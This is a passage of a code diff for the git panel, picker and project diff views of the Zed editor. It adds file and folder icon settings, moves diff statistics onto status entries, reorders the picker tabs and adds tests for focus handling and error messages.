settings.folder_icons; + let diff_stats = settings.diff_stats; if tree_view != was_tree_view { this.view_mode = GitPanelViewMode::from_settings(cx); } + + let mut update_entries = false; if sort_by_path != was_sort_by_path || tree_view != was_tree_view { this.bulk_staging.take(); + update_entries = true; + } + if (diff_stats != was_diff_stats) || update_entries { this.update_visible_entries(window, cx); } - if diff_stats != was_diff_stats { - if diff_stats { - this.fetch_diff_stats(cx); - } else { - this.diff_stats.clear(); - this.diff_stats_task = Task::ready(()); - cx.notify(); - } + if file_icons != was_file_icons || folder_icons != was_folder_icons { + cx.notify(); } was_sort_by_path = sort_by_path; was_tree_view = tree_view; + was_file_icons = file_icons; + was_folder_icons = folder_icons; was_diff_stats = diff_stats; }) .detach(); + cx.observe_global::(|_, cx| { + cx.notify(); + }) + .detach(); + // just to let us render a placeholder editor. // Once the active git repo is set, this buffer will be replaced. let temporary_buffer = cx.new(|cx| Buffer::local("", cx)); @@ -769,9 +780,7 @@ impl GitPanel { move |this, _git_store, event, window, cx| match event { GitStoreEvent::RepositoryUpdated( _, - RepositoryEvent::StatusesChanged - | RepositoryEvent::BranchChanged - | RepositoryEvent::MergeHeadsChanged, + RepositoryEvent::StatusesChanged | RepositoryEvent::HeadChanged, true, ) | GitStoreEvent::RepositoryAdded @@ -792,33 +801,6 @@ impl GitPanel { ) .detach(); - let buffer_store = project.read(cx).buffer_store().clone(); - - for buffer in project.read(cx).opened_buffers(cx) { - cx.subscribe(&buffer, |this, _buffer, event, cx| { - if matches!(event, BufferEvent::Saved) { - if GitPanelSettings::get_global(cx).diff_stats { - this.fetch_diff_stats(cx); - } - } - }) - .detach(); - } - - cx.subscribe(&buffer_store, |_this, _store, event, cx| { - if let BufferStoreEvent::BufferAdded(buffer) = event { - cx.subscribe(buffer, |this, _buffer, event, cx| { - if matches!(event, BufferEvent::Saved) { - if GitPanelSettings::get_global(cx).diff_stats { - this.fetch_diff_stats(cx); - } - } - }) - .detach(); - } - }) - .detach(); - let mut this = Self { active_repository, commit_editor, @@ -849,7 +831,6 @@ impl GitPanel { tracked_count: 0, tracked_staged_count: 0, update_visible_entries_task: Task::ready(()), - width: None, show_placeholders: false, local_committer: None, local_committer_task: None, @@ -859,8 +840,6 @@ impl GitPanel { entry_count: 0, bulk_staging: None, stash_entries: Default::default(), - diff_stats: HashMap::default(), - diff_stats_task: Task::ready(()), _settings_subscription, }; @@ -944,9 +923,9 @@ impl GitPanel { } fn serialize(&mut self, cx: &mut Context) { - let width = self.width; let amend_pending = self.amend_pending; let signoff_enabled = self.signoff_enabled; + let kvp = KeyValueStore::global(cx); self.pending_serialization = cx.spawn(async move |git_panel, cx| { cx.background_executor() @@ -967,16 +946,14 @@ impl GitPanel { }; cx.background_spawn( async move { - KEY_VALUE_STORE - .write_kvp( - serialization_key, - serde_json::to_string(&SerializedGitPanel { - width, - amend_pending, - signoff_enabled, - })?, - ) - .await?; + kvp.write_kvp( + serialization_key, + serde_json::to_string(&SerializedGitPanel { + amend_pending, + signoff_enabled, + })?, + ) + .await?; anyhow::Ok(()) } .log_err(), @@ -994,16 +971,11 @@ impl GitPanel { let mut dispatch_context = KeyContext::new_with_defaults(); dispatch_context.add("GitPanel"); - if window - .focused(cx) - .is_some_and(|focused| self.focus_handle == focused) - { - dispatch_context.add("menu"); - dispatch_context.add("ChangesList"); - } - if self.commit_editor.read(cx).is_focused(window) { dispatch_context.add("CommitEditor"); + } else if self.focus_handle.contains_focused(window, cx) { + dispatch_context.add("menu"); + dispatch_context.add("ChangesList"); } dispatch_context @@ -1152,7 +1124,22 @@ impl GitPanel { } if matches!(self.entries.get(new_index), Some(GitListEntry::Header(..))) { - self.selected_entry = Some(new_index.saturating_sub(1)); + self.selected_entry = match &self.view_mode { + GitPanelViewMode::Flat => Some(new_index.saturating_sub(1)), + GitPanelViewMode::Tree(tree_view_state) => { + maybe!({ + let current_logical_index = tree_view_state + .logical_indices + .iter() + .position(|&i| i == new_index)?; + + tree_view_state + .logical_indices + .get(current_logical_index.saturating_sub(1)) + .copied() + }) + } + }; } else { self.selected_entry = Some(new_index); } @@ -1378,6 +1365,7 @@ impl GitPanel { &snapshot, language::Point::new(0, 0), Direction::Next, + true, window, cx, ); @@ -2167,6 +2155,7 @@ impl GitPanel { CommitOptions { amend: false, signoff: self.signoff_enabled, + allow_empty: false, }, window, cx, @@ -2207,6 +2196,7 @@ impl GitPanel { CommitOptions { amend: true, signoff: self.signoff_enabled, + allow_empty: false, }, window, cx, @@ -2279,6 +2269,7 @@ impl GitPanel { RewrapOptions { override_language_settings: false, preserve_existing_whitespace: true, + line_length: None, }, cx, ); @@ -3576,6 +3567,7 @@ impl GitPanel { repo_path: entry.repo_path.clone(), status: entry.status, staging, + diff_stat: entry.diff_stat, }; if staging.has_staged() { @@ -3612,6 +3604,7 @@ impl GitPanel { repo_path: ops.repo_path.clone(), status: status.status, staging: StageStatus::Staged, + diff_stat: status.diff_stat, }); } } @@ -3744,60 +3737,9 @@ impl GitPanel { editor.set_placeholder_text(&placeholder_text, window, cx) }); - if GitPanelSettings::get_global(cx).diff_stats { - self.fetch_diff_stats(cx); - } - cx.notify(); } - fn fetch_diff_stats(&mut self, cx: &mut Context) { - let Some(repo) = self.active_repository.clone() else { - self.diff_stats.clear(); - return; - }; - - let unstaged_rx = repo.update(cx, |repo, cx| repo.diff_stat(DiffType::HeadToWorktree, cx)); - let staged_rx = repo.update(cx, |repo, cx| repo.diff_stat(DiffType::HeadToIndex, cx)); - - self.diff_stats_task = cx.spawn(async move |this, cx| { - let (unstaged_result, staged_result) = - futures::future::join(unstaged_rx, staged_rx).await; - - let mut combined = match unstaged_result { - Ok(Ok(stats)) => stats, - Ok(Err(err)) => { - log::warn!("Failed to fetch unstaged diff stats: {err:?}"); - HashMap::default() - } - Err(_) => HashMap::default(), - }; - - let staged = match staged_result { - Ok(Ok(stats)) => Some(stats), - Ok(Err(err)) => { - log::warn!("Failed to fetch staged diff stats: {err:?}"); - None - } - Err(_) => None, - }; - - if let Some(staged) = staged { - for (path, stat) in staged { - let entry = combined.entry(path).or_default(); - entry.added += stat.added; - entry.deleted += stat.deleted; - } - } - - this.update(cx, |this, cx| { - this.diff_stats = combined; - cx.notify(); - }) - .ok(); - }); - } - fn header_state(&self, header_type: Section) -> ToggleState { let (staged_count, count) = match header_type { Section::New => (self.new_staged_count, self.new_count), @@ -4514,7 +4456,11 @@ impl GitPanel { git_panel .update(cx, |git_panel, cx| { git_panel.commit_changes( - CommitOptions { amend, signoff }, + CommitOptions { + amend, + signoff, + allow_empty: false, + }, window, cx, ); @@ -4580,7 +4526,7 @@ impl GitPanel { fn render_previous_commit( &self, - window: &mut Window, + _window: &mut Window, cx: &mut Context, ) -> Option { let active_repository = self.active_repository.as_ref()?; @@ -4665,18 +4611,16 @@ impl GitPanel { ), ) }) - .when(window.is_action_available(&Open, cx), |this| { - this.child( - panel_icon_button("git-graph-button", IconName::GitGraph) - .icon_size(IconSize::Small) - .tooltip(|_window, cx| { - Tooltip::for_action("Open Git Graph", &Open, cx) - }) - .on_click(|_, window, cx| { - window.dispatch_action(Open.boxed_clone(), cx) - }), - ) - }), + .child( + panel_icon_button("git-graph-button", IconName::GitGraph) + .icon_size(IconSize::Small) + .tooltip(|_window, cx| { + Tooltip::for_action("Open Git Graph", &Open, cx) + }) + .on_click(|_, window, cx| { + window.dispatch_action(Open.boxed_clone(), cx) + }), + ), ), ) } @@ -4944,7 +4888,7 @@ impl GitPanel { }), ) .custom_scrollbars( - Scrollbars::for_settings::() + Scrollbars::for_settings::() .tracked_scroll_handle(&self.scroll_handle) .with_track_along( ScrollAxes::Horizontal, @@ -5103,15 +5047,21 @@ impl GitPanel { window: &Window, cx: &Context, ) -> AnyElement { - let tree_view = GitPanelSettings::get_global(cx).tree_view; + let settings = GitPanelSettings::get_global(cx); + let tree_view = settings.tree_view; let path_style = self.project.read(cx).path_style(cx); let git_path_style = ProjectSettings::get_global(cx).git.path_style; let display_name = entry.display_name(path_style); let selected = self.selected_entry == Some(ix); let marked = self.marked_entries.contains(&ix); - let status_style = GitPanelSettings::get_global(cx).status_style; + let status_style = settings.status_style; let status = entry.status; + let file_icon = if settings.file_icons { + FileIcons::get_icon(entry.repo_path.as_std_path(), cx) + } else { + None + }; let has_conflict = status.is_conflicted(); let is_modified = status.is_modified(); @@ -5188,7 +5138,24 @@ impl GitPanel { .min_w_0() .flex_1() .gap_1() - .child(git_status_icon(status)) + .when(settings.file_icons, |this| { + this.child( + file_icon + .map(|file_icon| { + Icon::from_path(file_icon) + .size(IconSize::Small) + .color(Color::Muted) + }) + .unwrap_or_else(|| { + Icon::new(IconName::File) + .size(IconSize::Small) + .color(Color::Muted) + }), + ) + }) + .when(status_style != StatusStyle::LabelColor, |el| { + el.child(git_status_icon(status)) + }) .map(|this| { if tree_view { this.pl(px(depth as f32 * TREE_INDENT)).child( @@ -5228,17 +5195,14 @@ impl GitPanel { .active(|s| s.bg(active_bg)) .child(name_row) .when(GitPanelSettings::get_global(cx).diff_stats, |el| { - el.when_some( - self.diff_stats.get(&entry.repo_path).copied(), - move |this, stat| { - let id = format!("diff-stat-{}", id_for_diff_stat); - this.child(ui::DiffStat::new( - id, - stat.added as usize, - stat.deleted as usize, - )) - }, - ) + el.when_some(entry.diff_stat, move |this, stat| { + let id = format!("diff-stat-{}", id_for_diff_stat); + this.child(ui::DiffStat::new( + id, + stat.added as usize, + stat.deleted as usize, + )) + }) }) .child( div() @@ -5359,10 +5323,24 @@ impl GitPanel { ) }; - let folder_icon = if entry.expanded { - IconName::FolderOpen + let settings = GitPanelSettings::get_global(cx); + let folder_icon = if settings.folder_icons { + FileIcons::get_folder_icon(entry.expanded, entry.key.path.as_std_path(), cx) + } else { + FileIcons::get_chevron_icon(entry.expanded, cx) + }; + let fallback_folder_icon = if settings.folder_icons { + if entry.expanded { + IconName::FolderOpen + } else { + IconName::Folder + } } else { - IconName::Folder + if entry.expanded { + IconName::ChevronDown + } else { + IconName::ChevronRight + } }; let stage_status = if let Some(repo) = &self.active_repository { @@ -5385,9 +5363,17 @@ impl GitPanel { .gap_1() .pl(px(entry.depth as f32 * TREE_INDENT)) .child( - Icon::new(folder_icon) - .size(IconSize::Small) - .color(Color::Muted), + folder_icon + .map(|folder_icon| { + Icon::from_path(folder_icon) + .size(IconSize::Small) + .color(Color::Muted) + }) + .unwrap_or_else(|| { + Icon::new(fallback_folder_icon) + .size(IconSize::Small) + .color(Color::Muted) + }), ) .child(self.entry_label(entry.name.clone(), label_color).truncate()); @@ -5554,12 +5540,14 @@ impl GitPanel { mut cx: AsyncWindowContext, ) -> anyhow::Result> { let serialized_panel = match workspace - .read_with(&cx, |workspace, _| Self::serialization_key(workspace)) + .read_with(&cx, |workspace, cx| { + Self::serialization_key(workspace).map(|key| (key, KeyValueStore::global(cx))) + }) .ok() .flatten() { - Some(serialization_key) => cx - .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) }) + Some((serialization_key, kvp)) => cx + .background_spawn(async move { kvp.read_kvp(&serialization_key) }) .await .context("loading git panel") .log_err() @@ -5576,7 +5564,6 @@ impl GitPanel { if let Some(serialized_panel) = serialized_panel { panel.update(cx, |panel, cx| { - panel.width = serialized_panel.width; panel.amend_pending = serialized_panel.amend_pending; panel.signoff_enabled = serialized_panel.signoff_enabled; cx.notify(); @@ -5630,6 +5617,21 @@ impl GitPanel { } } +#[cfg(any(test, feature = "test-support"))] +impl GitPanel { + pub fn new_test( + workspace: &mut Workspace, + window: &mut Window, + cx: &mut Context, + ) -> Entity { + Self::new(workspace, window, cx) + } + + pub fn active_repository(&self) -> Option<&Entity> { + self.active_repository.as_ref() + } +} + impl Render for GitPanel { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { let project = self.project.read(cx); @@ -5756,11 +5758,12 @@ impl editor::Addon for GitPanelAddon { fn render_buffer_header_controls( &self, - excerpt_info: &ExcerptInfo, + _excerpt_info: &ExcerptBoundaryInfo, + buffer: &language::BufferSnapshot, window: &Window, cx: &App, ) -> Option { - let file = excerpt_info.buffer.file()?; + let file = buffer.file()?; let git_panel = self.workspace.upgrade()?.read(cx).panel::(cx)?; git_panel @@ -5792,15 +5795,8 @@ impl Panel for GitPanel { }); } - fn size(&self, _: &Window, cx: &App) -> Pixels { - self.width - .unwrap_or_else(|| GitPanelSettings::get_global(cx).default_width) - } - - fn set_size(&mut self, size: Option, _: &mut Window, cx: &mut Context) { - self.width = size; - self.serialize(cx); - cx.notify(); + fn default_size(&self, _: &Window, cx: &App) -> Pixels { + GitPanelSettings::get_global(cx).default_width } fn icon(&self, _: &Window, cx: &App) -> Option { @@ -5811,12 +5807,24 @@ impl Panel for GitPanel { Some("Git Panel") } + fn icon_label(&self, _: &Window, cx: &App) -> Option { + if !GitPanelSettings::get_global(cx).show_count_badge { + return None; + } + let total = self.changes_count; + (total > 0).then(|| total.to_string()) + } + fn toggle_action(&self) -> Box { Box::new(ToggleFocus) } + fn starts_open(&self, _: &Window, cx: &App) -> bool { + GitPanelSettings::get_global(cx).starts_open + } + fn activation_priority(&self) -> u32 { - 2 + 3 } } @@ -6424,7 +6432,7 @@ pub(crate) fn show_error_toast( cx: &mut App, ) { let action = action.into(); - let message = e.to_string().trim().to_string(); + let message = format_git_error_toast_message(&e); if message .matches(git::repository::REMOTE_CANCELLED_BY_USER) .next() @@ -6450,13 +6458,27 @@ pub(crate) fn show_error_toast( } } +fn rpc_error_raw_message_from_chain(error: &anyhow::Error) -> Option<&str> { + error + .chain() + .find_map(|cause| cause.downcast_ref::().map(RpcError::raw_message)) +} + +fn format_git_error_toast_message(error: &anyhow::Error) -> String { + if let Some(message) = rpc_error_raw_message_from_chain(error) { + message.trim().to_string() + } else { + error.to_string().trim().to_string() + } +} + #[cfg(test)] mod tests { use git::{ repository::repo_path, status::{StatusCode, UnmergedStatus, UnmergedStatusCode}, }; - use gpui::{TestAppContext, UpdateGlobal, VisualTestContext}; + use gpui::{TestAppContext, UpdateGlobal, VisualTestContext, px}; use indoc::indoc; use project::FakeFs; use serde_json::json; @@ -6475,12 +6497,53 @@ mod tests { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(LoadThemes::JustBase, cx); + theme_settings::init(LoadThemes::JustBase, cx); editor::init(cx); crate::init(cx); }); } + #[test] + fn test_format_git_error_toast_message_prefers_raw_rpc_message() { + let rpc_error = RpcError::from_proto( + &proto::Error { + message: + "Your local changes to the following files would be overwritten by merge\n" + .to_string(), + code: proto::ErrorCode::Internal as i32, + tags: Default::default(), + }, + "Pull", + ); + + let message = format_git_error_toast_message(&rpc_error); + assert_eq!( + message, + "Your local changes to the following files would be overwritten by merge" + ); + } + + #[test] + fn test_format_git_error_toast_message_prefers_raw_rpc_message_when_wrapped() { + let rpc_error = RpcError::from_proto( + &proto::Error { + message: + "Your local changes to the following files would be overwritten by merge\n" + .to_string(), + code: proto::ErrorCode::Internal as i32, + tags: Default::default(), + }, + "Pull", + ); + let wrapped = rpc_error.context("sending pull request"); + + let message = format_git_error_toast_message(&wrapped); + assert_eq!( + message, + "Your local changes to the following files would be overwritten by merge" + ); + } + #[gpui::test] async fn test_entry_worktree_paths(cx: &mut TestAppContext) { init_test(cx); @@ -6554,11 +6617,19 @@ mod tests { repo_path: repo_path("crates/gpui/gpui.rs"), status: StatusCode::Modified.worktree(), staging: StageStatus::Unstaged, + diff_stat: Some(DiffStat { + added: 1, + deleted: 1, + }), }), GitListEntry::Status(GitStatusEntry { repo_path: repo_path("crates/util/util.rs"), status: StatusCode::Modified.worktree(), staging: StageStatus::Unstaged, + diff_stat: Some(DiffStat { + added: 1, + deleted: 1, + }), },), ], ); @@ -6579,11 +6650,19 @@ mod tests { repo_path: repo_path("crates/gpui/gpui.rs"), status: StatusCode::Modified.worktree(), staging: StageStatus::Unstaged, + diff_stat: Some(DiffStat { + added: 1, + deleted: 1, + }), }), GitListEntry::Status(GitStatusEntry { repo_path: repo_path("crates/util/util.rs"), status: StatusCode::Modified.worktree(), staging: StageStatus::Unstaged, + diff_stat: Some(DiffStat { + added: 1, + deleted: 1, + }), },), ], ); @@ -7785,4 +7864,133 @@ mod tests { let message = panel.update(cx, |panel, cx| panel.suggest_commit_message(cx)); assert_eq!(message, Some("Update tracked".to_string())); } + + #[gpui::test] + async fn test_dispatch_context_with_focus_states(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + path!("/project"), + json!({ + ".git": {}, + "tracked": "tracked\n", + }), + ) + .await; + + fs.set_head_and_index_for_repo( + path!("/project/.git").as_ref(), + &[("tracked", "old tracked\n".into())], + ); + + let project = Project::test(fs.clone(), [Path::new(path!("/project"))], cx).await; + let window_handle = + cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window_handle + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let cx = &mut VisualTestContext::from_window(window_handle.into(), cx); + let panel = workspace.update_in(cx, GitPanel::new); + + let handle = cx.update_window_entity(&panel, |panel, _, _| { + std::mem::replace(&mut panel.update_visible_entries_task, Task::ready(())) + }); + cx.executor().advance_clock(2 * UPDATE_DEBOUNCE); + handle.await; + + // Case 1: Focus the commit editor — should have "CommitEditor" but NOT "menu"/"ChangesList" + panel.update_in(cx, |panel, window, cx| { + panel.focus_editor(&FocusEditor, window, cx); + let editor_is_focused = panel.commit_editor.read(cx).is_focused(window); + assert!( + editor_is_focused, + "commit editor should be focused after focus_editor action" + ); + let context = panel.dispatch_context(window, cx); + assert!( + context.contains("GitPanel"), + "should always have GitPanel context" + ); + assert!( + context.contains("CommitEditor"), + "should have CommitEditor context when commit editor is focused" + ); + assert!( + !context.contains("menu"), + "should not have menu context when commit editor is focused" + ); + assert!( + !context.contains("ChangesList"), + "should not have ChangesList context when commit editor is focused" + ); + }); + + // Case 2: Focus the panel's focus handle directly — should have "menu" and "ChangesList". + // We force a draw via simulate_resize to ensure the dispatch tree is populated, + // since contains_focused() depends on the rendered dispatch tree. + panel.update_in(cx, |panel, window, cx| { + panel.focus_handle.focus(window, cx); + }); + cx.simulate_resize(gpui::size(px(800.), px(600.))); + + panel.update_in(cx, |panel, window, cx| { + let context = panel.dispatch_context(window, cx); + assert!( + context.contains("GitPanel"), + "should always have GitPanel context" + ); + assert!( + context.contains("menu"), + "should have menu context when changes list is focused" + ); + assert!( + context.contains("ChangesList"), + "should have ChangesList context when changes list is focused" + ); + assert!( + !context.contains("CommitEditor"), + "should not have CommitEditor context when changes list is focused" + ); + }); + + // Case 3: Switch back to commit editor and verify context switches correctly + panel.update_in(cx, |panel, window, cx| { + panel.focus_editor(&FocusEditor, window, cx); + }); + + panel.update_in(cx, |panel, window, cx| { + let context = panel.dispatch_context(window, cx); + assert!( + context.contains("CommitEditor"), + "should have CommitEditor after switching focus back to editor" + ); + assert!( + !context.contains("menu"), + "should not have menu after switching focus back to editor" + ); + }); + + // Case 4: Re-focus changes list and verify it transitions back correctly + panel.update_in(cx, |panel, window, cx| { + panel.focus_handle.focus(window, cx); + }); + cx.simulate_resize(gpui::size(px(800.), px(600.))); + + panel.update_in(cx, |panel, window, cx| { + assert!( + panel.focus_handle.contains_focused(window, cx), + "panel focus handle should report contains_focused when directly focused" + ); + let context = panel.dispatch_context(window, cx); + assert!( + context.contains("menu"), + "should have menu context after re-focusing changes list" + ); + assert!( + context.contains("ChangesList"), + "should have ChangesList context after re-focusing changes list" + ); + }); + } } diff --git a/crates/git_ui/src/git_panel_settings.rs b/crates/git_ui/src/git_panel_settings.rs index 2a7480de355a6190494211d823e4aa440d191371..9ccbced249db6707f1b5bca609f5dddea47bbd6a 100644 --- a/crates/git_ui/src/git_panel_settings.rs +++ b/crates/git_ui/src/git_panel_settings.rs @@ -1,4 +1,4 @@ -use editor::EditorSettings; +use editor::{EditorSettings, ui_scrollbar_settings_from_raw}; use gpui::Pixels; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; @@ -20,15 +20,22 @@ pub struct GitPanelSettings { pub dock: DockPosition, pub default_width: Pixels, pub status_style: StatusStyle, + pub file_icons: bool, + pub folder_icons: bool, pub scrollbar: ScrollbarSettings, pub fallback_branch_name: String, pub sort_by_path: bool, pub collapse_untracked_diff: bool, pub tree_view: bool, pub diff_stats: bool, + pub show_count_badge: bool, + pub starts_open: bool, } -impl ScrollbarVisibility for GitPanelSettings { +#[derive(Default)] +pub(crate) struct GitPanelScrollbarAccessor; + +impl ScrollbarVisibility for GitPanelScrollbarAccessor { fn visibility(&self, cx: &ui::App) -> ShowScrollbar { // TODO: This PR should have defined Editor's `scrollbar.axis` // as an Option, not a ScrollbarAxes as it would allow you to @@ -38,7 +45,8 @@ impl ScrollbarVisibility for GitPanelSettings { // so we can show each axis based on the settings. // // We should fix this. PR: https://github.com/zed-industries/zed/pull/19495 - self.scrollbar + GitPanelSettings::get_global(cx) + .scrollbar .show .unwrap_or_else(|| EditorSettings::get_global(cx).scrollbar.show) } @@ -52,14 +60,22 @@ impl Settings for GitPanelSettings { dock: git_panel.dock.unwrap().into(), default_width: px(git_panel.default_width.unwrap()), status_style: git_panel.status_style.unwrap(), + file_icons: git_panel.file_icons.unwrap(), + folder_icons: git_panel.folder_icons.unwrap(), scrollbar: ScrollbarSettings { - show: git_panel.scrollbar.unwrap().show.map(Into::into), + show: git_panel + .scrollbar + .unwrap() + .show + .map(ui_scrollbar_settings_from_raw), }, fallback_branch_name: git_panel.fallback_branch_name.unwrap(), sort_by_path: git_panel.sort_by_path.unwrap(), collapse_untracked_diff: git_panel.collapse_untracked_diff.unwrap(), tree_view: git_panel.tree_view.unwrap(), diff_stats: git_panel.diff_stats.unwrap(), + show_count_badge: git_panel.show_count_badge.unwrap(), + starts_open: git_panel.starts_open.unwrap(), } } } diff --git a/crates/git_ui/src/git_picker.rs b/crates/git_ui/src/git_picker.rs index 82ef9c9516b7c145edbf26d6c5b8927189525cab..bf9d122a7ec16b11c56fc45f59ff8c5f85f7fded 100644 --- a/crates/git_ui/src/git_picker.rs +++ b/crates/git_ui/src/git_picker.rs @@ -15,7 +15,7 @@ use workspace::{ModalView, Workspace, pane}; use crate::branch_picker::{self, BranchList, DeleteBranch, FilterRemotes}; use crate::stash_picker::{self, DropStashItem, ShowStashItem, StashList}; use crate::worktree_picker::{ - self, WorktreeFromDefault, WorktreeFromDefaultOnWindow, WorktreeList, + self, DeleteWorktree, WorktreeFromDefault, WorktreeFromDefaultOnWindow, WorktreeList, }; actions!( @@ -25,8 +25,8 @@ actions!( #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] pub enum GitPickerTab { - Branches, Worktrees, + Branches, Stash, } @@ -190,9 +190,9 @@ impl GitPicker { fn activate_next_tab(&mut self, window: &mut Window, cx: &mut Context) { self.tab = match self.tab { - GitPickerTab::Branches => GitPickerTab::Worktrees, - GitPickerTab::Worktrees => GitPickerTab::Stash, - GitPickerTab::Stash => GitPickerTab::Branches, + GitPickerTab::Worktrees => GitPickerTab::Branches, + GitPickerTab::Branches => GitPickerTab::Stash, + GitPickerTab::Stash => GitPickerTab::Worktrees, }; self.ensure_active_picker(window, cx); self.focus_active_picker(window, cx); @@ -201,9 +201,9 @@ impl GitPicker { fn activate_previous_tab(&mut self, window: &mut Window, cx: &mut Context) { self.tab = match self.tab { - GitPickerTab::Branches => GitPickerTab::Stash, - GitPickerTab::Worktrees => GitPickerTab::Branches, - GitPickerTab::Stash => GitPickerTab::Worktrees, + GitPickerTab::Worktrees => GitPickerTab::Stash, + GitPickerTab::Branches => GitPickerTab::Worktrees, + GitPickerTab::Stash => GitPickerTab::Branches, }; self.ensure_active_picker(window, cx); self.focus_active_picker(window, cx); @@ -241,9 +241,9 @@ impl GitPicker { "git-picker-tabs", [ ToggleButtonSimple::new( - GitPickerTab::Branches.to_string(), + GitPickerTab::Worktrees.to_string(), cx.listener(|this, _, window, cx| { - this.tab = GitPickerTab::Branches; + this.tab = GitPickerTab::Worktrees; this.ensure_active_picker(window, cx); this.focus_active_picker(window, cx); cx.notify(); @@ -251,16 +251,16 @@ impl GitPicker { ) .tooltip(move |_, cx| { Tooltip::for_action_in( - "Toggle Branch Picker", - &ActivateBranchesTab, - &branches_focus_handle, + "Toggle Worktree Picker", + &ActivateWorktreesTab, + &worktrees_focus_handle, cx, ) }), ToggleButtonSimple::new( - GitPickerTab::Worktrees.to_string(), + GitPickerTab::Branches.to_string(), cx.listener(|this, _, window, cx| { - this.tab = GitPickerTab::Worktrees; + this.tab = GitPickerTab::Branches; this.ensure_active_picker(window, cx); this.focus_active_picker(window, cx); cx.notify(); @@ -268,9 +268,9 @@ impl GitPicker { ) .tooltip(move |_, cx| { Tooltip::for_action_in( - "Toggle Worktree Picker", - &ActivateWorktreesTab, - &worktrees_focus_handle, + "Toggle Branch Picker", + &ActivateBranchesTab, + &branches_focus_handle, cx, ) }), @@ -297,8 +297,8 @@ impl GitPicker { .style(ToggleButtonGroupStyle::Outlined) .auto_width() .selected_index(match self.tab { - GitPickerTab::Branches => 0, - GitPickerTab::Worktrees => 1, + GitPickerTab::Worktrees => 0, + GitPickerTab::Branches => 1, GitPickerTab::Stash => 2, }), ) @@ -408,6 +408,19 @@ impl GitPicker { } } + fn handle_worktree_delete( + &mut self, + _: &DeleteWorktree, + window: &mut Window, + cx: &mut Context, + ) { + if let Some(worktree_list) = &self.worktree_list { + worktree_list.update(cx, |list, cx| { + list.handle_delete(&DeleteWorktree, window, cx); + }); + } + } + fn handle_drop_stash( &mut self, _: &DropStashItem, @@ -524,6 +537,7 @@ impl Render for GitPicker { .when(self.tab == GitPickerTab::Worktrees, |el| { el.on_action(cx.listener(Self::handle_worktree_from_default)) .on_action(cx.listener(Self::handle_worktree_from_default_on_window)) + .on_action(cx.listener(Self::handle_worktree_delete)) }) .when(self.tab == GitPickerTab::Stash, |el| { el.on_action(cx.listener(Self::handle_drop_stash)) diff --git a/crates/git_ui/src/git_ui.rs b/crates/git_ui/src/git_ui.rs index 76ea0f9797972186f358c67617ba6388e8530357..4e6669823a9d8f78c3c6113906d6b927c3f1fc70 100644 --- a/crates/git_ui/src/git_ui.rs +++ b/crates/git_ui/src/git_ui.rs @@ -46,6 +46,8 @@ pub mod stash_picker; pub mod text_diff_view; pub mod worktree_picker; +pub use conflict_view::MergeConflictIndicator; + pub fn init(cx: &mut App) { editor::set_blame_renderer(blame_ui::GitBlameRenderer, cx); commit_view::init(cx); @@ -258,11 +260,12 @@ pub fn resolve_active_repository(workspace: &Workspace, cx: &App) -> Option Option> { + fn breadcrumbs(&self, cx: &App) -> Option<(Vec, Option)> { self.editor.breadcrumbs(cx) } diff --git a/crates/git_ui/src/project_diff.rs b/crates/git_ui/src/project_diff.rs index f62b08e4c0d99db7d2e60e6aac730a69b139cca3..8fa4680593a7565c84efd7503f6cf9d188d3be35 100644 --- a/crates/git_ui/src/project_diff.rs +++ b/crates/git_ui/src/project_diff.rs @@ -2,7 +2,6 @@ use crate::{ conflict_view::ConflictAddon, git_panel::{GitPanel, GitPanelAddon, GitStatusEntry}, git_panel_settings::GitPanelSettings, - remote_button::{render_publish_button, render_push_button}, resolve_active_repository, }; use agent_settings::AgentSettings; @@ -18,8 +17,7 @@ use editor::{ use git::repository::DiffType; use git::{ - Commit, StageAll, StageAndNext, ToggleStaged, UnstageAll, UnstageAndNext, - repository::{Branch, RepoPath, Upstream, UpstreamTracking, UpstreamTrackingStatus}, + Commit, StageAll, StageAndNext, ToggleStaged, UnstageAll, UnstageAndNext, repository::RepoPath, status::FileStatus, }; use gpui::{ @@ -503,9 +501,11 @@ impl ProjectDiff { pub fn active_path(&self, cx: &App) -> Option { let editor = self.editor.read(cx).focused_editor().read(cx); + let multibuffer = editor.buffer().read(cx); let position = editor.selections.newest_anchor().head(); - let multi_buffer = editor.buffer().read(cx); - let (_, buffer, _) = multi_buffer.excerpt_containing(position, cx)?; + let snapshot = multibuffer.snapshot(cx); + let (text_anchor, _) = snapshot.anchor_to_buffer_anchor(position)?; + let buffer = multibuffer.buffer(text_anchor.buffer_id)?; let file = buffer.read(cx).file()?; Some(ProjectPath { @@ -517,7 +517,9 @@ impl ProjectDiff { fn move_to_beginning(&mut self, window: &mut Window, cx: &mut Context) { self.editor.update(cx, |editor, cx| { editor.rhs_editor().update(cx, |editor, cx| { - editor.move_to_beginning(&Default::default(), window, cx); + editor.change_selections(Default::default(), window, cx, |s| { + s.select_ranges(vec![multi_buffer::Anchor::Min..multi_buffer::Anchor::Min]); + }); }); }); } @@ -542,38 +544,7 @@ impl ProjectDiff { } pub fn calculate_changed_lines(&self, cx: &App) -> (u32, u32) { - let snapshot = self.multibuffer.read(cx).snapshot(cx); - let mut total_additions = 0u32; - let mut total_deletions = 0u32; - - let mut seen_buffers = HashSet::default(); - for (_, buffer, _) in snapshot.excerpts() { - let buffer_id = buffer.remote_id(); - if !seen_buffers.insert(buffer_id) { - continue; - } - - let Some(diff) = snapshot.diff_for_buffer_id(buffer_id) else { - continue; - }; - - let base_text = diff.base_text(); - - for hunk in diff.hunks_intersecting_range(Anchor::MIN..Anchor::MAX, buffer) { - let added_rows = hunk.range.end.row.saturating_sub(hunk.range.start.row); - total_additions += added_rows; - - let base_start = base_text - .offset_to_point(hunk.diff_base_byte_range.start) - .row; - let base_end = base_text.offset_to_point(hunk.diff_base_byte_range.end).row; - let deleted_rows = base_end.saturating_sub(base_start); - - total_deletions += deleted_rows; - } - } - - (total_additions, total_deletions) + self.multibuffer.read(cx).snapshot(cx).total_changed_lines() } /// Returns the total count of review comments across all hunks/files. @@ -598,17 +569,17 @@ impl ProjectDiff { .collect::>(); if !ranges.iter().any(|range| range.start != 